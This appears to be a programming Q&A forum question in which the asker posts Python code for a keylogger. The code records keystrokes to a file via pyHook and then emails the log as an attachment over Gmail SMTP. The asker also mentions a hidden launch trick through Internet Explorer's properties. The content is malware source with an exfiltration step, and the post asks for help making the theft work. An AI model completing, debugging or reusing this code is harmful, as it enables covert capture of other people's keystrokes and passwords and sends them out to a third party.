Sending an email attachment in mail using python

784 views Asked by At

I have made a simple keylogger which logs the keystrokes in the file called 'log.txt'. I want to then email this file by attaching it using smtp in python but unable to do so. Keylogger is working fine but the email is not sent. (For keylogger I attached the path of the file launch.bat to IEXPLORE properties) Why is it not working?

My code:

import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
import os
import email
import email.encoders
import email.mime.text
import pyHook, pythoncom, sys, logging

file_log = 'C:\\important\\log.txt'
def OnKeyboardEvent(event):
    logging.basicConfig(filename=file_log, level=logging.DEBUG, format='%(message)s')
    chr(event.Ascii)
    logging.log(10,chr(event.Ascii))
    return True
hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()

sender = '[email protected]'
receiver = ['[email protected]']
message = """From: From Shubha Goel <[email protected]>
To: To  Pooja Gupta<[email protected]>
Subject: SMTP e-mail test

This is a test e-mail message.
"""
file_name = 'C:\\important\\log.txt'
#msg = MIMEMultipart()
msg=email.MIMEMultipart.MIMEMultipart('mixed')
msg['From'] = sender
msg['To'] = receiver
msg['Subject'] = message
msg['Date'] = email.Utils.formatdate(localtime=True)

# build the attachment
att = email.MIMEBase.MIMEBase('application', 'base64')
att.set_payload(open(file_name, 'rb').read())
email.Encoders.encode_base64(att)
att.add_header('Content-Disposition', 'attachment; filename="%s"' % os.path.basename(file_name))
msg.attach(att)
print 'successfully built attachment'
try:
    session = smtplib.SMTP('smtp.gmail.com',587)
    print 'Starting..'
    session.ehlo()
    print 'ehlo executed..'
    session.starttls()
    print 'starttls done'

    session.login(sender,password)
    print 'logged in'
    session.sendmail(sender,receiver,msg.as_string())
    print 'sendmail executed..now quitting'

except smtplib.SMTPRecipientsRefused:
    print 'Recipient refused'
except smtplib.SMTPAuthenticationError:
    print 'Auth error'
except smtplib.SMTPSenderRefused:
    print 'Sender refused'
except smtplib.SMTPException:
    print('Error')

Please Help. I am new to smtp and keylogger.
